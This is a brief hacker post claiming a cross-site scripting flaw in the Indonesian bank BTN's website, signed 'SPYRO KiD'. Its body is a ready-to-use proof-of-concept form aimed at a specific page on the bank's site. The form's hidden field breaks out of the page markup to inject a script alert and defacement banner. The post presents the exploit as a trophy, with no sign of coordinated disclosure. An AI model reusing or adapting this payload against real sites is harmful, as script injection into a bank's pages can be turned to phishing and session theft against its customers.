Bank BTN Vulnerable to XSS

btn.co.id XSSED by SPYRO KiD

btn.co.id Menerima Semua Tag HTML
POC:
<form name="srchBTNCare" method="post" action="http://www.btn.co.id/btn_care_cat.asp"> <input type="hidden" name="srchField" size="20" value=""></form></td></tr></table><center><br><h1>XSSED<br><br>by<br><br>SPYRO KiD<br>http://spyrozone.net</h1><br><br><script>alert("XSSED by SPYRO KiD\nhttp://spyrozone.net || admin@spyrozone.net");</script><noscript>"> <input name="submit" type="image" border="0" src="clickhere.gif" alt="Click Here" onClick="srchBTNCare.submit();"> <input type="hidden" name="srchParam" value="question"> <input type="hidden" name="srchDo" value="1"> </form>




